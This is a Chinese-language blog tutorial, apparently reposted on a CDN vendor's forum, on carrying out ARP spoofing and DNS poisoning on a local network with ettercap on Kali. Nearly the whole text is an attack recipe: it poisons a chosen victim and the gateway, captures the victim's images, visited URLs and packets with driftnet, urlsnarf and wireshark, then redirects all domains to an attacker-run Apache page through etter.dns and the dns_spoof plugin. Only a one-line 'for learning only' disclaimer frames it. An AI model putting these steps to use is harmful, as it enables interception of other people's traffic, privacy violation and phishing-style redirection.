DNS污染攻击详细教程

1. 在/etc/sysctl.conf的配置文件中,修改变量net.ipv4.ip_forward的值为 1,把前面的 # 去掉;若此变量没有,那就添加,

net.ipv4.ip_forward=1 

2. 下载ettercap

apt-get install ettercap
使用图像界面ettercap -G

3. ettercap -G 启动

 sniffing at startup 开启 primary interface 选择wlan0 点击右上角√

4. 开始ARP中间人模式

点击 scan for hosts 开启扫描本网段存活主机 点击 hosts list 查看扫出的存活主机 添加目标ip -------> add to Target1 添加网关ip -------> add to Target2 MITM menu----->ARP poisoning----->Sniff remote connections---->ok

到这里ARP欺骗已完成,下面需要进行抓取数据,图片,日志等。

5. 获取图片信息—->

driftnet -i wlan0 -a -d /root/arp/file

-a -d j静态保存到/root/arp/file目录中

监听网页日志—->

urlsnarf -i wlan0

抓 包————>

wireshark

6. 篡改网页信息(dns污染)

firstone!!!打开apache2服务, 0.service apache2 start 1.vim /etc/ettercap/etter.dns 2. * A 192.168.43.107------->(这里是kali的ip) 3.vim /var/www/html/index.html 4.点击Plugins选择插件,选择dns_spoof,双击确定。

此文章只供学习使用,有问题可以留言或私一信

原文链接:https://blog.csdn.net/m0_71088505/article/details/125012562?ops_request_misc=&request_id=d89bd289ac8a44d9922c587a8a843643&biz_id=&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~koosearch~default-12-125012562-null-null.268%5Ev1%5Econtrol&utm_term=dns%E9%98%B2%E6%8A%A4

原创文章,作者:优速盾-小U,如若转载,请注明出处:https://www.cdnb.net/bbs/archives/23414

(0)
上一篇 2023年10月12日 15:38
下一篇 2023年10月12日

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注

优速盾注册领取大礼包www.cdnb.net
/sitemap.xml